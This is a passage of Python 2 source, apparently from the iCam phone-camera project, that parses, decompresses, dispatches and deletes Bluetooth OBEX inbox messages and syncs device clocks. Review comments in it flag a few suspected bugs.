                "with %s, so we consider it not being an " \
                "iCam BT message. Bailing out without " \
                "processing or erasing the message..." % \
                (fileNameBtMsg, BT_OBEX_FILENAME_PREFIX))
            return -1
        # sizeBluetoothMessage = bluetoothInbox.size(btMsgId)
        #btMsgData = BluetoothMessageReadData(bluetoothInbox, btMsgId)
        btMsgData = BluetoothMessageReadData(btMsgId)
        if btMsgData is None:
            #!!!!TODO check specifically for "SymbianError: [Errno -20] KErrCorrupt" and only then do BluetoothDeleteMessage
            BluetoothDeleteMessage(btMsgId, True)
            return -1
    except:
        #print("size is %d" % sizeBluetoothMessage)
        #print(repr(BluetoothMessageReadData(bluetoothInbox, btMsgId)))
        DebugPrintErrorTrace()
        BluetoothDeleteMessage(btMsgId, True)
        return -1
    ###########################################################################
    ###########################################################################
    #####Now we have read entirely the Bluetooth message in btMsgData##########
    ###########################################################################
    ###########################################################################
    # Checking integrity of the BT msg received and reading vars from header.
    try:
        #if btMsgData == "":
        if len(btMsgData) < 4 + 1:
            DebugPrint("BluetoothMessageProcessAndDelete(): len(btMsgData) = %d. " \
                "Too small, so we consider it invalid and delete " \
                "the message. Bailing out..." % len(btMsgData))
            """
            if deleteMessageIfInvalid:
                #bluetoothInbox.delete(btMsgId)
                BluetoothDeleteMessage(btMsgId)
            """
            BluetoothDeleteMessage(btMsgId, True)
            return -1
        if NEW_BT_FORMAT == False:
            ####################################################################
            ####################################################################
            ####Now we check the first word of btMsgData == fileDataSize####
            ####################################################################
            ####################################################################
            # !!!!Be careful at endianess.
            # fileDataSize = int(bluetoothFD.read(4))
            """
            IMPORTANT: We require < to specify little endian and ALSO no
            alignment (see http://docs.python.org/library/struct.html).
            """
            (fileDataSize, ) = struct.unpack("<i", btMsgData[0 : 4])
            DebugPrint("BluetoothMessageProcessAndDelete(): " \
                "fileDataSize=%s." % fileDataSize)
            if len(btMsgData) - 4 != fileDataSize:
                DebugPrint("BluetoothMessageProcessAndDelete(): " \
                    "len(btMsgData) - 4 != fileDataSize. " \
                    "So, it appears this Bluetooth message was " \
                    "not sent by an iCam Bluetooth client. " \
                    "len(btMsgData) = %d, fileDataSize = %d. " \
                    "Bailing out..." % (len(btMsgData), fileDataSize))
                """
                We delete it (or store it in an Error folder, if BT messages are
                DIRECTLY accessible via the FS (Symbian 3+, Android)
                """
                BluetoothDeleteMessage(btMsgId, True)
                return -1
        """
        NOTE THAT THE CHECK WE DO IS NOT RELIABLE
        It seems the magic byte 0x78 is always there
        - when using zlib.compressobj(1).compress() we have 0x78 0x01
        - when using encode("zlib") we have 0x78 0x9C
        # Check for Gzip stream header.
        if not (btMsgData[4] == 0x78 and stateMediaData[
            btMsgData[5] == 0x9C):
            return
        """
        DebugPrint("BluetoothMessageProcessAndDelete(): " \
            "len(btMsgData) = %d" % len(btMsgData))
        #######################################################################
        ###Unzipping, unpacking the deviceId and creating the corresponding####
        ### Unsent folder for the deviceId.###################################
        #######################################################################
        """
        if fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) : \
            len(BT_OBEX_FILENAME_PREFIX) + \
            len(BT_OBEX_FILENAME_PREFIX_TYPE_FIL)] == \
            BT_OBEX_FILENAME_PREFIX_TYPE_FIL:
        """
        # NOTE(review): the old-format branch tests the TXT type prefix even
        # though the comment below says "arbitrary file" - confirm intended.
        if (NEW_BT_FORMAT and
                fileNameBtMsg.endswith(EXTENSION_ARBITRARY_FILE)) or \
                (not NEW_BT_FORMAT and \
                fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) : ].\
                startswith(BT_OBEX_FILENAME_PREFIX_TYPE_TXT)):
            # Arbitrary file (Not SMF, nor CMD, nor TXT)
            """
            It is very possible that the uncompressed data can be huge so we
            use zlib.decompressobj to partially decompress.
            """
            zlibDecompressObject = zlib.decompressobj()
            if NEW_BT_FORMAT:
                stateMediaDataCompressed = btMsgData
            else:
                stateMediaDataCompressed = btMsgData[4:]
            # See http://docs.python.org/library/zlib.html .
            stateMediaData = zlibDecompressObject.decompress(
                stateMediaDataCompressed,
                struct.calcsize(statePackFormat) + 1000)
            """
            # Maybe a few times with max_length = 8 * 1024
            stateMediaData += zlibDecompressObject.decompress(
                zlibDecompressObject.unconsumed_tail)
            stateMediaData += zlibDecompressObject.flush()
            """
            # Treat well!!!! - put in outter block
            if NEW_BT_FORMAT:
                #!!!!
                pass
            # !!!!TODO if suffix _icam.jpg then don't need to decode
            # elif ():
        else:
            if NEW_BT_FORMAT:
                stateMediaData = btMsgData
            else:
                """
                This treats SMF, CMD, and TXT.
                Note that for CMD and SMF the uncompressed data is roughly the
                same size as the compressed one.
                """
                # stateMediaData = btMsgData[4 : ].decode("zlib")
                stateMediaData = btMsgData[4:].decode("zlib")
        ###########################################################################
        ###########################################################################
        ##Now we have in stateMediaData the state data and file data (if required)##
        ###########################################################################
        ###########################################################################
        if NEW_BT_FORMAT:
            # This assumes the deviceId has 15 chars
            #btClientDeviceId = fileNameBtMsg[-21:-6]
            btClientDeviceId = fileNameBtMsg.split("_")[-2]
        else:
            """
            IMPORTANT NOTE: we use "<" to specify no alignment -
            see http://docs.python.org/library/struct.html
            """
            (btClientDeviceId, ) = struct.unpack(deviceIdFormat,
                stateMediaData[0 : struct.calcsize(deviceIdFormat)])
            firstNullCharIndex = btClientDeviceId.find("\x00")
            btClientDeviceId = btClientDeviceId[0 : firstNullCharIndex]
        """
        pathName = LOCAL_FOLDER_UNSENT_FILES + "/" + btClientDeviceId
        if not os.path.exists(pathName):
            os.makedirs(pathName)
        """
        DebugPrint("BluetoothMessageProcessAndDelete(): " \
            "btClientDeviceId = %s." % btClientDeviceId)
        #DebugPrint("len(fileName) = %d" % len(fileName))
    except:
        try:
            if deleteMessageIfInvalid:
                # bluetoothInbox.delete(btMsgId)
                BluetoothDeleteMessage(btMsgId, True)
        except:
            DebugPrintErrorTrace()
        (exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
        errorStr = "Exception in BluetoothMessageProcessAndDelete() with btMsgId = %s" \
            " - details: free_ram = %d. exceptionTraceback = %s, " \
            "exceptionType = %s, exceptionValue = %s. Bailing out..." % \
            (str(btMsgId), GetFreeRAM(),
            repr(traceback.format_tb(exceptionTraceback)),
            str(exceptionType), str(exceptionValue))
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
                WEBPAGE_UL_GZIPPED_TEXT, None)
        DebugPrint("Exception in BluetoothMessageProcessAndDelete() " \
            "with btMsgId = %s. Bailing out..." % str(btMsgId))
        DebugPrintErrorTrace()
        return -1
    ###########################################################################
    ###########################################################################
    ######Now, depending on file type, we process and delete the message.######
    ###########################################################################
    ###########################################################################
    # The order of processing is somewhat relevant - we have CMD BT messages
    # with extension .cmd.txt and TXT BT messages with .txt extension, so we
    # look first for CMD BT and then TXT BT messages.
    try:
        # If the message is CMD:
        #if (NEW_BT_FORMAT and str.lower(fileNameBtMsg[-4:])
        #        in BT_OBEX_EXTENSION_LIST_CMD) or \
        if (NEW_BT_FORMAT and
                str.lower(fileNameBtMsg).endswith(BT_OBEX_EXTENSION_CMD)) or \
                (not NEW_BT_FORMAT and
                fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]. \
                startswith(BT_OBEX_FILENAME_PREFIX_TYPE_CMD)):
            BluetoothMessageProcessCMD(btMsgId, btMsgData, stateMediaData,
                fileNameBtMsg, btClientDeviceId)
        elif str.lower(fileNameBtMsg).endswith(BT_OBEX_EXTENSION_TIM):
            BluetoothMessageProcessTIM(btMsgId)
        # If the message is TXT:
        elif (NEW_BT_FORMAT and str.lower(fileNameBtMsg[-4:])
                in BT_OBEX_EXTENSION_LIST_TXT) or \
                (not NEW_BT_FORMAT and
                fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]. \
                startswith(BT_OBEX_FILENAME_PREFIX_TYPE_TXT)):
            BluetoothMessageProcessTXT(btMsgId, btMsgData,
                fileNameBtMsg, btClientDeviceId)
        # If the message is FIL (contains an arbitrary file):
        elif (NEW_BT_FORMAT and str.lower(fileNameBtMsg[-4:])
                in BT_OBEX_EXTENSION_LIST_FIL) or \
                (not NEW_BT_FORMAT and
                fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]. \
                startswith(BT_OBEX_FILENAME_PREFIX_TYPE_FIL)):
            BluetoothMessageProcessFIL(btMsgId, btMsgData,
                fileNameBtMsg, btClientDeviceId)
        # If the message is SMF (contains state and media file):
        #elif str.lower(fileNameBtMsg[len(fileNameBtMsg)
        #    - 4:]) in [".jpg", ".png", ".3gp", ".mp4"]:
        elif (NEW_BT_FORMAT and str.lower(fileNameBtMsg[-4:])
                in BT_OBEX_EXTENSION_LIST_SMF) or \
                (not NEW_BT_FORMAT and
                fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]. \
                startswith(BT_OBEX_FILENAME_PREFIX_TYPE_SMF)):
            res = GetInfoFromSMFBtMsg(stateMediaData, fileNameBtMsg)
            DebugPrint(
                "BluetoothMessageProcessAndDelete(): res = %s." % (str(res)))
            if res is None:
                return -1
            cameraId = res[0]
            (tm_year, tm_mon, tm_mday,
                tm_hour, tm_min, tm_sec, numMilliseconds) = res[1]
            #!!!!TODO: check CRC in state of BT iCam message - can be put in state
            """
            We check the validity of the date returned, since we had once
            errors in the BT message (either uSD card or radio error) - see
            Z:\1PhD\ReVival\Logs\NokiaN82\2013_11_17\stdout_2013_11_09_15_51_19.txt
            "GetInfoFromSMFBtMsg(): cameraId = 0,
            tm_year = 253733044, tm_mon = -1312688652, tm_mday = 1,
            tm_hour = 54, tm_min = -120, tm_sec=-120,
            numMilliseconds=736101691, btMsgStateTime = 1366848153 ."
            """
            # Sanity-check the decoded timestamp; reject corrupted states.
            if (tm_year > 1900 and tm_year < 2200) and \
                    (tm_mon > 0 and tm_mon <= 12) and \
                    (tm_mday > 0 and tm_mday <= 31) and \
                    (tm_hour >= 0 and tm_hour < 24) and \
                    (tm_min >= 0 and tm_min < 60) and \
                    (tm_sec >= 0 and tm_sec < 60) and \
                    (numMilliseconds >= 0 and numMilliseconds < 1000):
                pass
            else:
                return -1
            #def RemoveOldBluetoothMessages():
            """
            VERY IMPORTANT:
            We filter videos: the old ones w.r.t. the new ones already sent.
            The video recentness info is kept as <deviceId, crtCameraId>
            in btMsgMostRecentTime.
            We persist btMsgMostRecentTime on disk.
            The old videos are deleted.
            Note that only when the newly uploaded videos are uploaded to
            YouTube, there is a pauseIntervalGdata pause to wait.
            """
            global btMsgMostRecentTime, btAddrTable
            # res[2] is the BT client's MAC address (see GetInfoFromSMFBtMsg).
            btAddrTable[btClientDeviceId] = res[2]
            """
            # Unfortunately time.mktime() DOES NOT WORK ON
            # PyS60 2.0. It simply crashes it without an
            # exception...
            #From http://www.tutorialspoint.com/python/time_mktime.htm
            """
            if SYMBIAN_OS:
                crtVideoTime = (tm_year, tm_mon, tm_mday,
                    tm_hour, tm_min, tm_sec)
            else:
                crtVideoTime = time.mktime( (tm_year, tm_mon, tm_mday,
                    tm_hour, tm_min, tm_sec,
                    0, -1, -1) )
            updatedBtMsgMostRecentTime = False
            crtDevCam = (btClientDeviceId, cameraId)
            if crtDevCam not in btMsgMostRecentTime:
                btMsgMostRecentTime[crtDevCam] = crtVideoTime
                updatedBtMsgMostRecentTime = True
            else:
                DebugPrint("btMsgMostRecentTime[crtDevCam] = %s" % \
                    str(btMsgMostRecentTime[crtDevCam]))
                if btMsgMostRecentTime[crtDevCam] >= crtVideoTime:
                    #The crt video to upload to YT is older than the last uploaded.
                    DebugPrint("BluetoothMessageProcessAndDelete(): The " \
                        "current BT file (with crtVideoTime=%s) is " \
                        "older than the last processed one " \
                        "(with btMsgMostRecentTime[crtDevCam] = %s)." % \
                        (str(crtVideoTime), \
                        str(btMsgMostRecentTime[crtDevCam])))
                    BluetoothDeleteMessage(btMsgId)
                    return 0 # should it be -1? !!!!
                else:
                    btMsgMostRecentTime[crtDevCam] = crtVideoTime
                    updatedBtMsgMostRecentTime = True
            if (bluetoothMode == 1) and (updatedBtMsgMostRecentTime == True):
                # BT server and updated btMsgMostRecentTime
                StoreBtMsgMostRecentTime()
            aBatteryLevel = -1
            aChargerStatus = -1
            try:
                aBatteryLevel = res[3]
                aChargerStatus = res[4]
            except:
                DebugPrintErrorTrace()
            """
            IMPORTANT: GetInfoFromSMFBtMsg() needs to be called before to
            update btMsgStateTime.
            BluetoothTimeSyncWithDrift() checks if BT message arrival time and
            btMsgStateTime are very different then send time-sync
            adjustment command BT msg.
            Note that BluetoothTimeSyncWithDrift() is better to be called
            before BluetoothMessageProcessSMF(), which deletes the BT msg
            at the end.
            IMPORTANT NOTE: BluetoothMessageProcessSMF() deletes the BT msg
            at the end, by calling BluetoothDeleteMessage().
            """
            BluetoothTimeSyncWithDrift(btClientDeviceId, \
                sizeBluetoothMessage, btMsgId)
            BluetoothMessageProcessSMF(btMsgId, btMsgData, stateMediaData,
                fileNameBtMsg, btClientDeviceId,
                aBatteryLevel, aChargerStatus)
        else:
            """
            The message altough has iCam prefix name, does NOT have the
            right extension.
            """
            #if deleteMessageIfInvalid:
            BluetoothDeleteMessage(btMsgId, True)
            return -1
        return 0
    except:
        DebugPrintErrorTrace()
        return -1
# Cached list of BT inbox message handles (filenames on Android/Raspbian/
# Windows/Symbian^3, Messaging msg IDs on older Symbian); refreshed by
# GetBluetoothInboxMessageList() and consumed by BluetoothMessageListProcess().
btMsgList = None
"""
Returns the list of BT message filenames (WITHOUT path),
in ~chronological order.
"""
def GetInboxFolderList():
    """Return the iCam BT message filenames (no path) from the inbox folder.

    Entries are sorted in reverse lexicographic order, which - because the
    filenames embed timestamps - is ~reverse chronological (most recent
    first). Only names starting with BT_OBEX_FILENAME_PREFIX are kept.

    On Symbian^3 devices, received BT messages are no longer stored in
    Messaging but in the "E:\\Received files" folder (original note).
    """
    entries = os.listdir(BLUETOOTH_INBOX_PATH)
    # Reverse lexicographic sort == most recent message first.
    entries.sort(reverse=True)
    # TODO: consider discarding the TXT and CMD files here (original note).
    res = [name for name in entries
           if name.startswith(BT_OBEX_FILENAME_PREFIX)]
    DebugPrint("GetInboxFolderList(): res = %s" % \
        str(res))
    return res
"""
Returns the list of BT messages, in ~chronological order.
"""
def GetBluetoothInboxMessageList():
    """Return the BT message handles, most recent first.

    On Android/Raspbian/Windows/Symbian^3 the handles are filenames from
    the inbox folder; on older Symbian they are Messaging-inbox message IDs
    obtained via pyinbox.

    NOTE(review): if none of the platform flags matches, 'res' is unbound
    and the final DebugPrint raises NameError - confirm the flags are
    exhaustive for all supported platforms.
    """
    global btMsgList
    DebugPrint("Entered GetBluetoothInboxMessageList().")
    if ANDROID_OS:
        res = GetInboxFolderList()
    elif RASPBIAN_OS:
        res = GetInboxFolderList()
    elif WINDOWS_OS:
        res = GetInboxFolderList()
    elif SYMBIAN_OS:
        if SYMBIAN_3:
            # Symbian^3 stores received BT files in a folder, not Messaging.
            res = GetInboxFolderList()
        else:
            """
            The BT message IDs are increasing with an increment of 2.
            Normally (but I have seen exceptions - see
            http://mobile-revival.110mb.com/ReVival/N95N95N95N95N95/log.html,
            on May 2nd, 2011 at 3:35AM),
            btMsgList has the elements sorted decreasingly following the
            msg ID.
            """
            """
            0x10009ED5 is the constant used in Symbian to specify only the
            Bluetooth messages from Inbox - we create a CInboxAdapter that
            reads only BT messages (it appears that the infrastructure is
            the same for SMS, MMS, etc).
            This value must not be changed.
            For message types see -
            http://discussion.forum.nokia.com/forum/showthread.php?17779-message-type-SMS-MMS-EMail..-etc .
            """
            res = bluetoothInbox.list_messages(0x10009ED5)
    # Disabled diagnostic pass: logs name and arrival time of every message.
    if False:
        """
        !!!!Obtaining time from all messages, since we cannot really
        rely on the reverse chronological order returned by
        list_messages().
        """
        try:
            btMsgList = res
            DebugPrint("len(btMsgList) = %d" % len(btMsgList))
            for btMsgId in btMsgList:
                try:
                    """
                    description(btMsgId) returns the name of the file from the
                    BT message.
                    """
                    #!!!!TODO: make sure it's OK- Should be OK, since it's OK in BluetoothMessageProcessAndDelete()
                    fileNameBtMsg = GetBluetoothMessageName(btMsgId)
                    # Get message time of arrival.
                    btMsgArrivalTime = bluetoothInbox.time(btMsgId)
                    DebugPrint(
                        "GetBluetoothInboxMessageList(): " \
                        "btMsgId = %s, fileNameBtMsg = %s, " \
                        "btMsgArrivalTime = %d" % \
                        (str(btMsgId), fileNameBtMsg,
                        btMsgArrivalTime))
                    try:
                        btMsgArrivalTimeStruct = \
                            time.localtime(btMsgArrivalTime)
                        DebugPrint("    " + \
                            time.strftime("%Y_%m_%d_%H_%M_%S", \
                                btMsgArrivalTimeStruct))
                    except:
                        DebugPrintErrorTrace()
                except:
                    DebugPrintErrorTrace()
        except:
            DebugPrintErrorTrace()
    DebugPrint("GetBluetoothInboxMessageList(): len(res) = %d" % len(res))
    return res
def BluetoothMessageListProcess(deleteMessageIfInvalid=False, \
                                deleteAllBTMessages=False, \
                                processJustNonSMF_BtMsgs=False):
    """Drain the BT inbox: process/upload iCam BT messages.

    deleteMessageIfInvalid -- forwarded to BluetoothMessageProcessAndDelete();
        whether to delete messages that fail validation.
    deleteAllBTMessages -- (Symbian/Windows path only) delete every iCam BT
        message WITHOUT processing it.
    processJustNonSMF_BtMsgs -- (Symbian/Windows path only) return after
        handling the non-SMF (CMD/TEXT/FILE) messages.

    Bails out immediately when conserveEnergy is set. The global
    uploadHowManyOfLatestBluetoothMessages controls how much is processed:
    -1 = all, oldest first; > 0 = that many, most recent first; any other
    value = none.
    """
    global btMsgList, bluetoothInbox, conserveEnergy, \
        uploadHowManyOfLatestBluetoothMessages
    if conserveEnergy:
        if MY_DEBUG_STDOUT:
            print "BluetoothMessageListProcess(): bailing out because " \
                "conserveEnergy = True."
        # NOTE(review): this condition is always False here (we are inside
        # "if conserveEnergy:"), so the flush below never executes - it was
        # probably meant to be "if MY_DEBUG_STDOUT:". Confirm and fix.
        if conserveEnergy == False:
            sys.stdout.flush()
        return
    DebugPrint("Entered BluetoothMessageListProcess().")
    if ANDROID_OS or RASPBIAN_OS:
        try:
            btInboxFolderContent = GetInboxFolderList()
            if len(btInboxFolderContent) == 0:
                return
            # Process all the SMF BT messages.
            counterBluetoothMessages = 0
            if uploadHowManyOfLatestBluetoothMessages == -1:
                """
                This order ensures the messages are sent on the server exactly
                in the order they were received via Bluetooth (which
                should be chronological order)
                """
                rangeBtInboxFolderContent = range(len(btInboxFolderContent) - 1,
                                                  -1, -1)
            elif uploadHowManyOfLatestBluetoothMessages > 0:
                lenFolder = len(btInboxFolderContent)
                howMany = min(lenFolder,
                              uploadHowManyOfLatestBluetoothMessages)
                """
                for index in range(howMany):
                    BluetoothMessageProcessAndDelete(btInboxFolderContent[index],
                                                     deleteMessageIfInvalid)
                """
                for index in range(howMany):
                    """
                    We send the most recent BT message received - and then
                    check for most recent again immediately afterwards.
                    """
                    # Element [0] is always the most recent message, because
                    # GetInboxFolderList() returns most-recent-first.
                    BluetoothMessageProcessAndDelete(btInboxFolderContent[0],
                                                     deleteMessageIfInvalid)
                    """
                    We check if a new BT message has appeared -
                    BluetoothMessageProcessAndDelete() can take long to
                    finish, especially because it uploads to Internet.
                    """
                    btInboxFolderContent = GetInboxFolderList()
                    if len(btInboxFolderContent) == 0:
                        """
                        We do this return because we access otherwise
                        btInboxFolderContent[0]
                        """
                        return
                # This branch is fully handled; skip the generic loop below.
                return
                """
                if uploadHowManyOfLatestBluetoothMessages >= \
                        len(btInboxFolderContent):
                    rangeBtInboxFolderContent = \
                        range(len(btInboxFolderContent))
                else:
                    rangeBtInboxFolderContent = \
                        range(uploadHowManyOfLatestBluetoothMessages)
                """
            else:
                rangeBtInboxFolderContent = []
            for i in rangeBtInboxFolderContent:
                BluetoothMessageProcessAndDelete(btInboxFolderContent[i],
                                                 deleteMessageIfInvalid)
                # Periodically poll the server for new commands while
                # uploading a long backlog.
                if (counterBluetoothMessages %
                    NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS) == \
                    NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS - 1:
                    hasDownloadedNewCmd = DownloadCommands()
                counterBluetoothMessages += 1
        except:
            DebugPrintErrorTrace()
    elif SYMBIAN_OS or WINDOWS_OS:
        """
        if _PyS60_1_9_OR_NEWER:
            #The pyinbox module not supported in PyS60 1.9+
            return
        """
        try:
            btMsgList = GetBluetoothInboxMessageList()
            """
            # TODO!!!!Think if keep this - maybe should take it out or maybe put it in BluetoothMessageProcessAndDelete(doNotProcSMF=True)
            Process all CMD, TEXT and FILE (but not SMF - since they
            ~basically carry media) BT messages.
            Treat them in chronological order.
            """
            rangeBtMsgList = range(len(btMsgList) - 1, -1, -1)
            # Treat them in reverse chronological order (most recent ones first).
            for i in rangeBtMsgList:
                #for btMsgId in btMsgList:
                btMsgId = btMsgList[i]
                try:
                    """
                    description(btMsgId) returns the name of the file from the
                    BT message.
                    """
                    fileNameBtMsg = GetBluetoothMessageName(btMsgId)
                    # Checking if it is iCam BT message:
                    if fileNameBtMsg.startswith(BT_OBEX_FILENAME_PREFIX):
                        # Looking for iCam BT message that are not of SMF type.
                        if (NEW_BT_FORMAT and str.lower(fileNameBtMsg[-4:])
                            not in BT_OBEX_EXTENSION_LIST_SMF) or \
                            (not NEW_BT_FORMAT and
                            fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]. \
                            startswith(BT_OBEX_FILENAME_PREFIX_TYPE_SMF)):
                            BluetoothMessageProcessAndDelete(btMsgId,
                                                    deleteMessageIfInvalid)
                except:
                    DebugPrintErrorTrace()
            if processJustNonSMF_BtMsgs == True:
                return
            #TODO!!!! END - see above
            """
            We delete all iCam BT messages received if
            deleteAllBTMessages == True.
            This means we erase the SMF BT messages without
            processing them.!!!!
            """
            if deleteAllBTMessages:
                """
                Once it crashed probably here, probably because len(btMsgList) ~= 1800
                Therefore, if btMsgList is too big, we make it smaller.
                """
                if len(btMsgList) > 300:
                    btMsgList = btMsgList[0: 300]
                for btMsgId in btMsgList:
                    try:
                        """
                        description(btMsgId) returns the name of the file
                        from the BT message.
                        """
                        fileNameBtMsg = GetBluetoothMessageName(btMsgId)
                        # sizeBluetoothMessage = bluetoothInbox.size(btMsgId)
                        # This is iCam BT message
                        if fileNameBtMsg.startswith(BT_OBEX_FILENAME_PREFIX):
                            # bluetoothInbox.delete(btMsgId)
                            BluetoothDeleteMessage(btMsgId)
                    except:
                        DebugPrintErrorTrace()
                        if MY_DEBUG_UPLOAD_MSG:
                            myText = "BluetoothMessageListProcess(): " \
                                "Exception around " \
                                "BluetoothDeleteMessage(%s)." % str(btMsgId)
                            UploadGZippedData(deviceId, myText,
                                              ICAM_SERVER_NAME,
                                              WEBPAGE_UL_GZIPPED_TEXT, None)
                return
            # Now we process the SMF BT messages.
            """
            In case we deleted messages in the previous lines, we read the
            updated bluetoothInbox.list_messages() .
            """
            btMsgList = GetBluetoothInboxMessageList()
            counterBluetoothMessages = 0
            if uploadHowManyOfLatestBluetoothMessages == -1:
                """
                This order ensures the messages are sent on the server exactly
                in the order they were received via Bluetooth (which should
                be chronological order).
                """
                rangeBtMsgList = range(len(btMsgList) - 1, -1, -1)
                for i in rangeBtMsgList:
                    BluetoothMessageProcessAndDelete(btMsgList[i],
                                                     deleteMessageIfInvalid)
                    # Periodically poll the server for new commands.
                    if (counterBluetoothMessages %
                        NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS) == \
                        NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS - 1:
                        hasDownloadedNewCmd = DownloadCommands()
                    counterBluetoothMessages += 1
            elif uploadHowManyOfLatestBluetoothMessages > 0:
                for howMany in range(uploadHowManyOfLatestBluetoothMessages):
                    if len(btMsgList) == 0:
                        return
                    # We send the most recent BT message received
                    BluetoothMessageProcessAndDelete(btMsgList[0],
                                                     deleteMessageIfInvalid)
                    if (counterBluetoothMessages %
                        NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS) == \
                        NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS - 1:
                        hasDownloadedNewCmd = DownloadCommands()
                    counterBluetoothMessages += 1
                    #!!!!TODO: if we want more media upload fairness (among the BT clients) we should not update btMsgList
                    btMsgList = GetBluetoothInboxMessageList()
                    if len(btMsgList) == 0:
                        return
                return
                """
                if uploadHowManyOfLatestBluetoothMessages >= len(btMsgList):
                    rangeBtMsgList = range(len(btMsgList))
                else:
                    rangeBtMsgList = \
                        range(uploadHowManyOfLatestBluetoothMessages)
                """
            else:
                #rangeBtMsgList = []
                pass
        except:
            DebugPrintErrorTrace()
# Maps BT message id -> local arrival time (set in BluetoothMessageCallback(),
# read by BluetoothMessageProcessTIM() to compute the clock delta).
dictBtMsgTime = {}
#def BluetoothMessageProcessTIM(timeBluetoothMessage, btMsgId):
def BluetoothMessageProcessTIM(btMsgId):
    """Process a TIM (time-synchronization) Bluetooth message.

    The message's filename, after BT_OBEX_FILENAME_PREFIX, carries the
    sender's send time in Unix-era seconds. Comparing it with the locally
    recorded arrival time (dictBtMsgTime[btMsgId], set by
    BluetoothMessageCallback()) yields the clock delta between the two
    devices, which is applied via a "set-date-and-time-delta" command.
    The BT message is deleted afterwards. Failures are logged and swallowed
    (best-effort, consistent with the rest of the BT layer).

    Fixes vs. the original: removed the duplicated DebugPrint of
    fileNameBtMsg, the dead recomputation of deltaTime after
    ExecuteCommands(), and the disabled "if False:" parsing blocks.
    """
    global dictBtMsgTime
    try:
        # description(btMsgId) returns the name of the file from the BT msg.
        fileNameBtMsg = GetBluetoothMessageName(btMsgId)
        DebugPrint("BluetoothMessageProcessTIM(): " \
                   "fileNameBtMsg = %s." % fileNameBtMsg)
        # The remainder of the name encodes the sender's send time
        # (Unix-era seconds); int() raising on an unexpected name is caught
        # below, so the message is then kept rather than deleted.
        timeUnixEraSent = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) : ]
        timeSentUE = int(timeUnixEraSent)
        """
        We have:
            - dictBtMsgTime[btMsgId] is the time the message was received on
                this phone.
            - timeSentUE is the time the message relays directly through its
                fileNameBtMsg.
        So instead of time timeSentUE we have dictBtMsgTime[btMsgId] and we
        need to adjust.
        """
        deltaTime = dictBtMsgTime[btMsgId] - timeSentUE
        ExecuteCommands("set-date-and-time-delta %d" % int(deltaTime))
        BluetoothDeleteMessage(btMsgId)
    except:
        DebugPrintErrorTrace()
def BluetoothMessageCallback(btMsgId):
    """Callback fired when a new BT message lands in the inbox.

    Records the message's local arrival time in dictBtMsgTime (consumed
    later by BluetoothMessageProcessTIM() for time synchronization) and, on
    Symbian, logs the message's name and reported arrival time.
    Per the original notes, this callback is not invoked on Symbian^3
    devices.
    """
    global bluetoothInbox, dictBtMsgTime
    localArrivalTime = GetTime()
    # This is used in BluetoothMessageProcessTIM():
    dictBtMsgTime[btMsgId] = localArrivalTime
    if not SYMBIAN_OS:
        return
    reportedName = ""
    reportedArrivalTime = 0
    try:
        # NOTE (from original observations): while still inside this
        # callback the inbox reports an EMPTY name and a bogus arrival time
        # (~9.16e+12, unrelated to time.time()), so these values are logged
        # for diagnosis only; no real processing is attempted here.
        reportedName = GetBluetoothMessageName(btMsgId)
        reportedArrivalTime = bluetoothInbox.time(btMsgId)
    except:
        DebugPrintErrorTrace()
    try:
        DebugPrint("BluetoothMessageCallback(btMsgId=%s): crtTime = %d, " \
                   "fileNameBtMsg = %s, " \
                   "btMsgArrivalTime = %s." % \
                   (str(btMsgId), localArrivalTime, reportedName,
                    str(reportedArrivalTime)))
    except:
        DebugPrintErrorTrace()
def BluetoothServerInitialize():
    """Initialize the BT-server side: bind the Symbian BT inbox callback.

    Registers BluetoothMessageCallback() so it fires for each newly
    received Bluetooth message. Warns - without aborting - when no Internet
    access point is configured, since connectivity might come up later
    while iCam is still running.
    """
    global bluetoothInbox, btMsgList
    DebugPrint("Entered BluetoothServerInitialize().")
    if not SYMBIAN_OS:
        return
    try:
        # 0x10009ED5 restricts the Inbox adapter to Bluetooth messages only.
        bluetoothInbox = pyinbox.Inbox(0x10009ED5)
        # bind() calls us back with the id of every message received
        # (which might not be of type SMS).
        bluetoothInbox.bind(BluetoothMessageCallback)
    except:
        DebugPrintErrorTrace()
    if accessPointName == u"":
        DebugPrint("Warning: BT server not connected to the Internet.")
    DebugPrint("Exiting BluetoothServerInitialize().")
# Substring of the OBEX "Object Push" service name; used during BT service
# discovery to locate the OPP port on the server device.
OPP_SERVICE_NAME_TO_SEARCH_FOR = "Object Push"
def BluetoothClientDiscoverServer(aBluetoothServerAddress=""):
    """Discover the BT server device and its OBEX Object Push service port.

    Finds the device at aBluetoothServerAddress (or lets the user pick one
    interactively when empty) and stores the port of the service whose name
    contains OPP_SERVICE_NAME_TO_SEARCH_FOR in
    bluetoothServerOPPServicePort[address]; that port is later required by
    btsocket.bt_obex_send_file(). Symbian-only; only logs elsewhere.

    Fixes vs. the original: len(dict.items()) > 0 built a throwaway list in
    Python 2 - replaced with len(dict) > 0; substring test uses "in"
    instead of .find() != -1.
    """
    global bluetoothServerAddress, bluetoothServerOPPServicePort
    DebugPrint("Entered BluetoothClientDiscoverServer(" \
        "aBluetoothServerAddress = %s) - " \
        "bluetoothServerOPPServicePort = %s." % \
        (aBluetoothServerAddress, str(bluetoothServerOPPServicePort)))
    if SYMBIAN_OS:
        if aBluetoothServerAddress != "":
            bluetoothServerAddress = aBluetoothServerAddress
        """
        Note that the BT server can send BT msgs to more than 1 client,
        while the BT client can send BT msgs to only its server.
        """
        if ((bluetoothMode == 2) and # The phone is a BT client
            (len(bluetoothServerOPPServicePort) > 0)) or \
            (bluetoothServerAddress in bluetoothServerOPPServicePort):
